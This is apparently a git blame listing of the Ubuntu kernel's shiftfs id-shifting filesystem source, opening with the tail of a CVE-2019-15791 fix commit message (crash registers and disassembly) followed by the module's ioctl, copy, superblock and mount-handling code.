[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
|
2019-04-04 13:39:13 +00:00
|
|
|
btrfs_v1, btrfs_v2);
|
|
|
|
if (!ret)
|
|
|
|
ret = err;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
2019-06-11 09:47:35 +00:00
|
|
|
static bool in_ioctl_whitelist(int flag, unsigned long arg)
|
2019-04-04 13:39:13 +00:00
|
|
|
{
|
2019-06-11 09:47:35 +00:00
|
|
|
void __user *argp = (void __user *)arg;
|
|
|
|
u64 flags = 0;
|
|
|
|
|
2019-04-04 13:39:13 +00:00
|
|
|
switch (flag) {
|
2019-06-11 09:47:35 +00:00
|
|
|
case BTRFS_IOC_FS_INFO:
|
|
|
|
return true;
|
2019-04-04 13:39:13 +00:00
|
|
|
case BTRFS_IOC_SNAP_CREATE:
|
|
|
|
return true;
|
|
|
|
case BTRFS_IOC_SNAP_CREATE_V2:
|
|
|
|
return true;
|
|
|
|
case BTRFS_IOC_SUBVOL_CREATE:
|
|
|
|
return true;
|
|
|
|
case BTRFS_IOC_SUBVOL_CREATE_V2:
|
2019-06-11 09:47:35 +00:00
|
|
|
return true;
|
|
|
|
case BTRFS_IOC_SUBVOL_GETFLAGS:
|
|
|
|
return true;
|
|
|
|
case BTRFS_IOC_SUBVOL_SETFLAGS:
|
2019-07-19 15:50:47 +00:00
|
|
|
if (copy_from_user(&flags, argp, sizeof(flags)))
|
2019-06-11 09:47:35 +00:00
|
|
|
return false;
|
|
|
|
|
|
|
|
if (flags & ~BTRFS_SUBVOL_RDONLY)
|
|
|
|
return false;
|
|
|
|
|
2019-04-04 13:39:13 +00:00
|
|
|
return true;
|
|
|
|
case BTRFS_IOC_SNAP_DESTROY:
|
|
|
|
return true;
|
|
|
|
}
|
|
|
|
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static long shiftfs_ioctl(struct file *file, unsigned int cmd,
|
|
|
|
unsigned long arg)
|
|
|
|
{
|
|
|
|
switch (cmd) {
|
|
|
|
case FS_IOC_GETVERSION:
|
|
|
|
/* fall through */
|
|
|
|
case FS_IOC_GETFLAGS:
|
|
|
|
/* fall through */
|
|
|
|
case FS_IOC_SETFLAGS:
|
|
|
|
break;
|
|
|
|
default:
|
2019-06-11 09:47:35 +00:00
|
|
|
if (!in_ioctl_whitelist(cmd, arg) ||
|
2019-04-04 13:39:13 +00:00
|
|
|
!shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
|
|
|
|
return -ENOTTY;
|
2019-04-04 13:39:12 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
return shiftfs_real_ioctl(file, cmd, arg);
|
|
|
|
}
|
|
|
|
|
|
|
|
static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
|
|
|
|
unsigned long arg)
|
|
|
|
{
|
|
|
|
switch (cmd) {
|
|
|
|
case FS_IOC32_GETVERSION:
|
|
|
|
/* fall through */
|
|
|
|
case FS_IOC32_GETFLAGS:
|
|
|
|
/* fall through */
|
|
|
|
case FS_IOC32_SETFLAGS:
|
|
|
|
break;
|
|
|
|
default:
|
2019-06-11 09:47:35 +00:00
|
|
|
if (!in_ioctl_whitelist(cmd, arg) ||
|
2019-04-04 13:39:13 +00:00
|
|
|
!shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
|
|
|
|
return -ENOIOCTLCMD;
|
2019-04-04 13:39:12 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
return shiftfs_real_ioctl(file, cmd, arg);
|
|
|
|
}
|
|
|
|
|
|
|
|
enum shiftfs_copyop {
|
|
|
|
SHIFTFS_COPY,
|
|
|
|
SHIFTFS_CLONE,
|
|
|
|
SHIFTFS_DEDUPE,
|
|
|
|
};
|
|
|
|
|
|
|
|
static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
|
|
|
|
struct file *file_out, loff_t pos_out, u64 len,
|
|
|
|
unsigned int flags, enum shiftfs_copyop op)
|
|
|
|
{
|
|
|
|
ssize_t ret;
|
|
|
|
struct fd real_in, real_out;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
struct inode *inode_out = file_inode(file_out);
|
|
|
|
struct inode *loweri = inode_out->i_private;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file_out, &real_out);
|
|
|
|
if (ret)
|
|
|
|
return ret;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file_in, &real_in);
|
|
|
|
if (ret) {
|
|
|
|
fdput(real_out);
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(inode_out->i_sb);
|
|
|
|
switch (op) {
|
|
|
|
case SHIFTFS_COPY:
|
|
|
|
ret = vfs_copy_file_range(real_in.file, pos_in, real_out.file,
|
|
|
|
pos_out, len, flags);
|
|
|
|
break;
|
|
|
|
|
|
|
|
case SHIFTFS_CLONE:
|
|
|
|
ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
|
|
|
|
pos_out, len, flags);
|
|
|
|
break;
|
|
|
|
|
|
|
|
case SHIFTFS_DEDUPE:
|
|
|
|
ret = vfs_dedupe_file_range_one(real_in.file, pos_in,
|
|
|
|
real_out.file, pos_out, len,
|
|
|
|
flags);
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
/* Update size */
|
|
|
|
shiftfs_copyattr(loweri, inode_out);
|
|
|
|
|
|
|
|
fdput(real_in);
|
|
|
|
fdput(real_out);
|
|
|
|
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
|
|
|
|
struct file *file_out, loff_t pos_out,
|
|
|
|
size_t len, unsigned int flags)
|
|
|
|
{
|
|
|
|
return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len, flags,
|
|
|
|
SHIFTFS_COPY);
|
|
|
|
}
|
|
|
|
|
|
|
|
static loff_t shiftfs_remap_file_range(struct file *file_in, loff_t pos_in,
|
|
|
|
struct file *file_out, loff_t pos_out,
|
|
|
|
loff_t len, unsigned int remap_flags)
|
|
|
|
{
|
|
|
|
enum shiftfs_copyop op;
|
|
|
|
|
|
|
|
if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
|
|
|
|
return -EINVAL;
|
|
|
|
|
|
|
|
if (remap_flags & REMAP_FILE_DEDUP)
|
|
|
|
op = SHIFTFS_DEDUPE;
|
|
|
|
else
|
|
|
|
op = SHIFTFS_CLONE;
|
|
|
|
|
|
|
|
return shiftfs_copyfile(file_in, pos_in, file_out, pos_out, len,
|
|
|
|
remap_flags, op);
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
|
|
|
|
{
|
|
|
|
const struct cred *oldcred;
|
|
|
|
int err = -ENOTDIR;
|
2019-10-02 07:57:14 +00:00
|
|
|
struct file *realfile = file->private_data;
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
err = iterate_dir(realfile, ctx);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
const struct file_operations shiftfs_file_operations = {
|
|
|
|
.open = shiftfs_open,
|
|
|
|
.release = shiftfs_release,
|
2019-04-16 16:29:00 +00:00
|
|
|
.llseek = shiftfs_file_llseek,
|
2019-04-04 13:39:12 +00:00
|
|
|
.read_iter = shiftfs_read_iter,
|
|
|
|
.write_iter = shiftfs_write_iter,
|
|
|
|
.fsync = shiftfs_fsync,
|
|
|
|
.mmap = shiftfs_mmap,
|
|
|
|
.fallocate = shiftfs_fallocate,
|
|
|
|
.fadvise = shiftfs_fadvise,
|
|
|
|
.unlocked_ioctl = shiftfs_ioctl,
|
|
|
|
.compat_ioctl = shiftfs_compat_ioctl,
|
|
|
|
.copy_file_range = shiftfs_copy_file_range,
|
|
|
|
.remap_file_range = shiftfs_remap_file_range,
|
|
|
|
};
|
|
|
|
|
|
|
|
const struct file_operations shiftfs_dir_operations = {
|
2019-10-02 07:57:14 +00:00
|
|
|
.open = shiftfs_dir_open,
|
|
|
|
.release = shiftfs_dir_release,
|
2019-04-04 13:39:12 +00:00
|
|
|
.compat_ioctl = shiftfs_compat_ioctl,
|
|
|
|
.fsync = shiftfs_fsync,
|
|
|
|
.iterate_shared = shiftfs_iterate_shared,
|
2019-04-16 16:29:00 +00:00
|
|
|
.llseek = shiftfs_dir_llseek,
|
2019-04-04 13:39:12 +00:00
|
|
|
.read = generic_read_dir,
|
|
|
|
.unlocked_ioctl = shiftfs_ioctl,
|
|
|
|
};
|
|
|
|
|
|
|
|
static const struct address_space_operations shiftfs_aops = {
|
|
|
|
/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO */
|
|
|
|
.direct_IO = noop_direct_IO,
|
|
|
|
};
|
|
|
|
|
|
|
|
static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
|
|
|
|
umode_t mode, dev_t dev, struct dentry *dentry)
|
|
|
|
{
|
|
|
|
struct inode *loweri;
|
|
|
|
|
|
|
|
inode->i_ino = ino;
|
|
|
|
inode->i_flags |= S_NOCMTIME;
|
|
|
|
|
|
|
|
mode &= S_IFMT;
|
|
|
|
inode->i_mode = mode;
|
|
|
|
switch (mode & S_IFMT) {
|
|
|
|
case S_IFDIR:
|
|
|
|
inode->i_op = &shiftfs_dir_inode_operations;
|
|
|
|
inode->i_fop = &shiftfs_dir_operations;
|
|
|
|
break;
|
|
|
|
case S_IFLNK:
|
|
|
|
inode->i_op = &shiftfs_symlink_inode_operations;
|
|
|
|
break;
|
|
|
|
case S_IFREG:
|
|
|
|
inode->i_op = &shiftfs_file_inode_operations;
|
|
|
|
inode->i_fop = &shiftfs_file_operations;
|
|
|
|
inode->i_mapping->a_ops = &shiftfs_aops;
|
|
|
|
break;
|
|
|
|
default:
|
|
|
|
inode->i_op = &shiftfs_special_inode_operations;
|
|
|
|
init_special_inode(inode, mode, dev);
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
|
|
|
|
if (!dentry)
|
|
|
|
return;
|
|
|
|
|
|
|
|
loweri = dentry->d_inode;
|
|
|
|
if (!loweri->i_op->get_link)
|
|
|
|
inode->i_opflags |= IOP_NOFOLLOW;
|
|
|
|
|
|
|
|
shiftfs_copyattr(loweri, inode);
|
|
|
|
shiftfs_copyflags(loweri, inode);
|
|
|
|
set_nlink(inode, loweri->i_nlink);
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
|
|
|
|
{
|
|
|
|
struct super_block *sb = dentry->d_sb;
|
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
|
|
|
|
|
|
|
if (sbinfo->mark)
|
|
|
|
seq_show_option(m, "mark", NULL);
|
|
|
|
|
|
|
|
if (sbinfo->passthrough)
|
|
|
|
seq_printf(m, ",passthrough=%u", sbinfo->passthrough);
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
|
|
|
|
{
|
|
|
|
struct super_block *sb = dentry->d_sb;
|
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
|
|
|
struct dentry *root = sb->s_root;
|
|
|
|
struct dentry *realroot = root->d_fsdata;
|
|
|
|
struct path realpath = { .mnt = sbinfo->mnt, .dentry = realroot };
|
|
|
|
int err;
|
|
|
|
|
|
|
|
err = vfs_statfs(&realpath, buf);
|
2019-04-04 13:39:11 +00:00
|
|
|
if (err)
|
2019-04-04 13:39:12 +00:00
|
|
|
return err;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (!shiftfs_passthrough_statfs(sbinfo))
|
|
|
|
buf->f_type = sb->s_magic;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
return 0;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static void shiftfs_evict_inode(struct inode *inode)
|
|
|
|
{
|
|
|
|
struct inode *loweri = inode->i_private;
|
|
|
|
|
|
|
|
clear_inode(inode);
|
|
|
|
|
|
|
|
if (loweri)
|
|
|
|
iput(loweri);
|
|
|
|
}
|
|
|
|
|
|
|
|
static void shiftfs_put_super(struct super_block *sb)
|
|
|
|
{
|
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
|
|
|
|
|
|
|
if (sbinfo) {
|
|
|
|
mntput(sbinfo->mnt);
|
|
|
|
put_cred(sbinfo->creator_cred);
|
|
|
|
kfree(sbinfo);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
static const struct xattr_handler shiftfs_xattr_handler = {
|
|
|
|
.prefix = "",
|
|
|
|
.get = shiftfs_xattr_get,
|
|
|
|
.set = shiftfs_xattr_set,
|
|
|
|
};
|
|
|
|
|
|
|
|
const struct xattr_handler *shiftfs_xattr_handlers[] = {
|
|
|
|
#ifdef CONFIG_SHIFT_FS_POSIX_ACL
|
|
|
|
&shiftfs_posix_acl_access_xattr_handler,
|
|
|
|
&shiftfs_posix_acl_default_xattr_handler,
|
|
|
|
#endif
|
|
|
|
&shiftfs_xattr_handler,
|
|
|
|
NULL
|
|
|
|
};
|
|
|
|
|
|
|
|
static inline bool passthrough_is_subset(int old_flags, int new_flags)
|
|
|
|
{
|
|
|
|
if ((new_flags & old_flags) != new_flags)
|
|
|
|
return false;
|
|
|
|
|
|
|
|
return true;
|
|
|
|
}
|
|
|
|
|
2019-05-08 12:13:14 +00:00
|
|
|
static int shiftfs_super_check_flags(unsigned long old_flags,
|
|
|
|
unsigned long new_flags)
|
|
|
|
{
|
|
|
|
if ((old_flags & SB_RDONLY) && !(new_flags & SB_RDONLY))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if ((old_flags & SB_NOSUID) && !(new_flags & SB_NOSUID))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if ((old_flags & SB_NODEV) && !(new_flags & SB_NODEV))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if ((old_flags & SB_NOEXEC) && !(new_flags & SB_NOEXEC))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if ((old_flags & SB_NOATIME) && !(new_flags & SB_NOATIME))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if ((old_flags & SB_NODIRATIME) && !(new_flags & SB_NODIRATIME))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if (!(old_flags & SB_POSIXACL) && (new_flags & SB_POSIXACL))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
|
|
|
|
{
|
|
|
|
int err;
|
|
|
|
struct shiftfs_super_info new = {};
|
|
|
|
struct shiftfs_super_info *info = sb->s_fs_info;
|
|
|
|
|
|
|
|
err = shiftfs_parse_mount_options(&new, data);
|
2019-04-04 13:39:11 +00:00
|
|
|
if (err)
|
2019-04-04 13:39:12 +00:00
|
|
|
return err;
|
|
|
|
|
2019-05-08 12:13:14 +00:00
|
|
|
err = shiftfs_super_check_flags(sb->s_flags, *flags);
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
/* Mark mount option cannot be changed. */
|
|
|
|
if (info->mark || (info->mark != new.mark))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
if (info->passthrough != new.passthrough) {
|
|
|
|
/* Don't allow exceeding passthrough options of mark mount. */
|
2019-04-15 13:21:55 +00:00
|
|
|
if (!passthrough_is_subset(info->passthrough_mark,
|
2019-04-04 13:39:12 +00:00
|
|
|
info->passthrough))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
info->passthrough = new.passthrough;
|
|
|
|
}
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static const struct super_operations shiftfs_super_ops = {
|
|
|
|
.put_super = shiftfs_put_super,
|
|
|
|
.show_options = shiftfs_show_options,
|
|
|
|
.statfs = shiftfs_statfs,
|
|
|
|
.remount_fs = shiftfs_remount,
|
|
|
|
.evict_inode = shiftfs_evict_inode,
|
|
|
|
};
|
|
|
|
|
|
|
|
struct shiftfs_data {
|
|
|
|
void *data;
|
|
|
|
const char *path;
|
|
|
|
};
|
|
|
|
|
2019-05-08 12:13:14 +00:00
|
|
|
static void shiftfs_super_force_flags(struct super_block *sb,
|
|
|
|
unsigned long lower_flags)
|
|
|
|
{
|
|
|
|
sb->s_flags |= lower_flags & (SB_RDONLY | SB_NOSUID | SB_NODEV |
|
|
|
|
SB_NOEXEC | SB_NOATIME | SB_NODIRATIME);
|
|
|
|
|
|
|
|
if (!(lower_flags & SB_POSIXACL))
|
|
|
|
sb->s_flags &= ~SB_POSIXACL;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
|
|
|
|
int silent)
|
|
|
|
{
|
|
|
|
int err;
|
|
|
|
struct path path = {};
|
|
|
|
struct shiftfs_super_info *sbinfo_mp;
|
|
|
|
char *name = NULL;
|
|
|
|
struct inode *inode = NULL;
|
|
|
|
struct dentry *dentry = NULL;
|
|
|
|
struct shiftfs_data *data = raw_data;
|
|
|
|
struct shiftfs_super_info *sbinfo = NULL;
|
|
|
|
|
|
|
|
if (!data->path)
|
|
|
|
return -EINVAL;
|
|
|
|
|
|
|
|
sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
|
|
|
|
if (!sb->s_fs_info)
|
|
|
|
return -ENOMEM;
|
|
|
|
sbinfo = sb->s_fs_info;
|
|
|
|
|
|
|
|
err = shiftfs_parse_mount_options(sbinfo, data->data);
|
|
|
|
if (err)
|
|
|
|
return err;
|
|
|
|
|
|
|
|
/* to mount a mark, must be userns admin */
|
|
|
|
if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
|
|
|
|
return -EPERM;
|
|
|
|
|
|
|
|
name = kstrdup(data->path, GFP_KERNEL);
|
|
|
|
if (!name)
|
|
|
|
return -ENOMEM;
|
|
|
|
|
|
|
|
err = kern_path(name, LOOKUP_FOLLOW, &path);
|
|
|
|
if (err)
|
|
|
|
goto out_free_name;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
|
|
|
|
err = -ENOTDIR;
|
2019-04-04 13:39:12 +00:00
|
|
|
goto out_put_path;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
|
|
|
|
2019-05-08 12:13:14 +00:00
|
|
|
sb->s_flags |= SB_POSIXACL;
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
if (sbinfo->mark) {
|
2019-10-23 12:23:50 +00:00
|
|
|
struct cred *cred_tmp;
|
2019-04-04 13:39:12 +00:00
|
|
|
struct super_block *lower_sb = path.mnt->mnt_sb;
|
|
|
|
|
|
|
|
/* to mark a mount point, must root wrt lower s_user_ns */
|
|
|
|
if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
|
|
|
|
err = -EPERM;
|
|
|
|
goto out_put_path;
|
|
|
|
}
|
2019-04-04 13:39:11 +00:00
|
|
|
|
|
|
|
/*
|
|
|
|
* this part is visible unshifted, so make sure no
|
|
|
|
* executables that could be used to give suid
|
|
|
|
* privileges
|
|
|
|
*/
|
|
|
|
sb->s_iflags = SB_I_NOEXEC;
|
|
|
|
|
2019-05-08 12:13:14 +00:00
|
|
|
shiftfs_super_force_flags(sb, lower_sb->s_flags);
|
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
/*
|
2019-04-04 13:39:12 +00:00
|
|
|
* Handle nesting of shiftfs mounts by referring this mark
|
|
|
|
* mount back to the original mark mount. This is more
|
|
|
|
* efficient and alleviates concerns about stack depth.
|
2019-04-04 13:39:11 +00:00
|
|
|
*/
|
2019-04-04 13:39:12 +00:00
|
|
|
if (lower_sb->s_magic == SHIFTFS_MAGIC) {
|
|
|
|
sbinfo_mp = lower_sb->s_fs_info;
|
|
|
|
|
|
|
|
/* Doesn't make sense to mark a mark mount */
|
|
|
|
if (sbinfo_mp->mark) {
|
|
|
|
err = -EINVAL;
|
|
|
|
goto out_put_path;
|
|
|
|
}
|
|
|
|
|
|
|
|
if (!passthrough_is_subset(sbinfo_mp->passthrough,
|
|
|
|
sbinfo->passthrough)) {
|
|
|
|
err = -EPERM;
|
|
|
|
goto out_put_path;
|
|
|
|
}
|
|
|
|
|
|
|
|
sbinfo->mnt = mntget(sbinfo_mp->mnt);
|
|
|
|
dentry = dget(path.dentry->d_fsdata);
|
2019-04-15 13:21:55 +00:00
|
|
|
/*
|
|
|
|
* Copy up the passthrough mount options from the
|
|
|
|
* parent mark mountpoint.
|
|
|
|
*/
|
|
|
|
sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
|
2020-04-10 14:55:00 +00:00
|
|
|
sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
|
2019-04-04 13:39:12 +00:00
|
|
|
} else {
|
|
|
|
sbinfo->mnt = mntget(path.mnt);
|
|
|
|
dentry = dget(path.dentry);
|
2019-04-15 13:21:55 +00:00
|
|
|
/*
|
|
|
|
* For a new mark passthrough_mark and passthrough
|
|
|
|
* are identical.
|
|
|
|
*/
|
|
|
|
sbinfo->passthrough_mark = sbinfo->passthrough;
|
2019-04-04 13:39:12 +00:00
|
|
|
|
2020-04-10 14:55:00 +00:00
|
|
|
cred_tmp = prepare_creds();
|
|
|
|
if (!cred_tmp) {
|
|
|
|
err = -ENOMEM;
|
|
|
|
goto out_put_path;
|
|
|
|
}
|
|
|
|
/* Don't override disk quota limits or use reserved space. */
|
|
|
|
cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
|
|
|
|
sbinfo->creator_cred = cred_tmp;
|
2019-04-04 13:39:12 +00:00
|
|
|
}
|
|
|
|
} else {
|
|
|
|
/*
|
|
|
|
* This leg executes if we're admin capable in the namespace,
|
|
|
|
* so be very careful.
|
|
|
|
*/
|
|
|
|
err = -EPERM;
|
2019-04-04 13:39:11 +00:00
|
|
|
if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
|
2019-04-04 13:39:12 +00:00
|
|
|
goto out_put_path;
|
|
|
|
|
|
|
|
sbinfo_mp = path.dentry->d_sb->s_fs_info;
|
|
|
|
if (!sbinfo_mp->mark)
|
|
|
|
goto out_put_path;
|
|
|
|
|
|
|
|
if (!passthrough_is_subset(sbinfo_mp->passthrough,
|
|
|
|
sbinfo->passthrough))
|
|
|
|
goto out_put_path;
|
|
|
|
|
|
|
|
sbinfo->mnt = mntget(sbinfo_mp->mnt);
|
|
|
|
sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
|
2019-04-04 13:39:11 +00:00
|
|
|
dentry = dget(path.dentry->d_fsdata);
|
2019-04-15 13:21:55 +00:00
|
|
|
/*
|
|
|
|
* Copy up passthrough settings from mark mountpoint so we can
|
|
|
|
* verify when the overlay wants to remount with different
|
|
|
|
* passthrough settings.
|
|
|
|
*/
|
|
|
|
sbinfo->passthrough_mark = sbinfo_mp->passthrough;
|
2019-05-08 12:13:14 +00:00
|
|
|
shiftfs_super_force_flags(sb, path.mnt->mnt_sb->s_flags);
|
2019-04-04 13:39:12 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
|
|
|
|
if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
|
|
|
|
printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
|
|
|
|
err = -EINVAL;
|
|
|
|
goto out_put_path;
|
|
|
|
}
|
|
|
|
|
|
|
|
inode = new_inode(sb);
|
|
|
|
if (!inode) {
|
|
|
|
err = -ENOMEM;
|
|
|
|
goto out_put_path;
|
2019-04-04 13:39:11 +00:00
|
|
|
}
|
2019-04-04 13:39:12 +00:00
|
|
|
shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
|
|
|
|
|
|
|
|
ihold(dentry->d_inode);
|
|
|
|
inode->i_private = dentry->d_inode;
|
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
sb->s_magic = SHIFTFS_MAGIC;
|
2019-10-23 12:22:28 +00:00
|
|
|
sb->s_maxbytes = MAX_LFS_FILESIZE;
|
2019-04-04 13:39:11 +00:00
|
|
|
sb->s_op = &shiftfs_super_ops;
|
|
|
|
sb->s_xattr = shiftfs_xattr_handlers;
|
|
|
|
sb->s_d_op = &shiftfs_dentry_ops;
|
2019-04-04 13:39:12 +00:00
|
|
|
sb->s_root = d_make_root(inode);
|
|
|
|
if (!sb->s_root) {
|
|
|
|
err = -ENOMEM;
|
|
|
|
goto out_put_path;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
sb->s_root->d_fsdata = dentry;
|
2019-04-04 13:39:12 +00:00
|
|
|
sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
|
|
|
|
shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
dentry = NULL;
|
|
|
|
err = 0;
|
2019-04-04 13:39:11 +00:00
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
out_put_path:
|
2019-04-04 13:39:11 +00:00
|
|
|
path_put(&path);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
out_free_name:
|
2019-04-04 13:39:11 +00:00
|
|
|
kfree(name);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
dput(dentry);
|
|
|
|
|
2019-04-04 13:39:11 +00:00
|
|
|
return err;
|
|
|
|
}
|
|
|
|
|
|
|
|
static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
|
|
|
|
int flags, const char *dev_name, void *data)
|
|
|
|
{
|
|
|
|
struct shiftfs_data d = { data, dev_name };
|
|
|
|
|
|
|
|
return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
|
|
|
|
}
|
|
|
|
|
|
|
|
static struct file_system_type shiftfs_type = {
|
|
|
|
.owner = THIS_MODULE,
|
|
|
|
.name = "shiftfs",
|
|
|
|
.mount = shiftfs_mount,
|
|
|
|
.kill_sb = kill_anon_super,
|
|
|
|
.fs_flags = FS_USERNS_MOUNT,
|
|
|
|
};
|
|
|
|
|
|
|
|
static int __init shiftfs_init(void)
|
|
|
|
{
|
|
|
|
return register_filesystem(&shiftfs_type);
|
|
|
|
}
|
|
|
|
|
|
|
|
static void __exit shiftfs_exit(void)
|
|
|
|
{
|
|
|
|
unregister_filesystem(&shiftfs_type);
|
|
|
|
}
|
|
|
|
|
|
|
|
MODULE_ALIAS_FS("shiftfs");
|
|
|
|
MODULE_AUTHOR("James Bottomley");
|
2019-04-04 13:39:12 +00:00
|
|
|
MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
|
|
|
|
MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
|
|
|
|
MODULE_DESCRIPTION("id shifting filesystem");
|
2019-04-04 13:39:11 +00:00
|
|
|
MODULE_LICENSE("GPL v2");
|
|
|
|
module_init(shiftfs_init)
|
|
|
|
module_exit(shiftfs_exit)
|